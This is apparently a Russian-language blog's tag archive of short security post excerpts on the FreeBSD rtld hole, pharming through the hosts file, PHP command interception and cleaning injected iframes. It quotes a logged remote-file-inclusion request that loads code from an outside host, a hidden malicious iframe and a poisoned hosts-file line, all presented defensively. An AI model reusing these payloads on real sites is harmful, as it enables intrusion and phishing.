Архив метки: взлом

Function hijaking

Перехват функций – архиполезная штука. Если нет возможности изобрести пяттиколесный велосопед, поймать опасную функцию (системную команду) за хвост можно с помощью модуля Baxtep (спасибо Андрею). Baxtep – PHP security extension to intercept execution of system commands. Для сборки модуля понадобятся пара прямых рук и такие команды: # скачиваем с репозитория svn checkout https://baxtep.googlecode.com/svn/trunk/ baxtep #… Читать далее »

Защита от фарминг-атаки

Фарминг-атаки – это атаки, при которых браузер пользователя скрытно направляется на фишинговый (поддельный) сайт. Файл hosts По умолчанию, файл HOSTS лежит в каталоге %SYSTEMROOT%\system32\drivers\etc (другой вариант указания пути: %WINDIR%\system32\drivers\etc). Вирус изменяет этот файл, прописывая (добавляя) там строку с IP-адресом и именем фишингового сайта (точнее, подделываемого): 1.1.1.1 vkontakte.ru Теперь при заходе на сайт ВКонтакте, браузер пользователя… Читать далее »

R.I.P. ICQ

Случилось то, чего все ждали боялись. Аську купили россияне. Digital Sky Technologies купил ICQ за $187,5 млн. Теперь ушлые коммерсанты требуют деньги у всех альтернативных клиентов, надеясь ан выплаты или на то, что народ перебежит с отказавшихся альтернативных клиентов на их "родной" и станет смотреть рекламу. Авторы мобильного клиента Nimbuzz уже опубликовали отчет о причинах,… Читать далее »

Опасная уязвимость FreeBSD

В операционной системе FreeBSD найдена опасная уязвимость. Эксплойт вышел в паблик раньше, чем патч, так что скорее включайте /dev/hands: cd /usr/src/libexec/rtld-elf fetch https://people.freebsd.org/~cperciva/rtld.patch patch < rtld.patch make & make install Уязвимости подвержены все версии от 7.1 до 8.0. Сам эксплойт под катом. ЗЫ Проверено, эксплойт работает. ЗЗЫ У меня не получилось пропатчить, скопировать кусок кода… Читать далее »

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »

Чистка файлов от iframe вставок

По мотивам предыдущей заметки =) Итак, если ваш сайт взломан или подобран пароль к вашему фтп-аккаунту и в некоторых (или во всех) файлах присутствует вражеский код iframe – самое время заняться чисткой. Обнаружение противника Для начала вражеский код нужно обнаружить. Самый безопасный и правильный подход – найти подозрительные участки кода в зараженных файлах и детерминировать… Читать далее »

БигМир накручивает показы?

По всей видимости, в компанию СпутникМедиа пришел кризис – bigmir.net накручивает показы с помощью iframe. Эта тема сейчас активно обсуждается в листе рассылки Webman. Есть также версия, что это просто подстава, только кому она выгодна? А тем временем, на страницах сайтов можно найти коде ифрейма: <iframe src=»hxxp://metanscript.com/s/in.cgi?4″ width=»0″ height=»0″ scrolling=»no» frameborder=»0″></iframe> 17:25 [220] ~ ~>… Читать далее »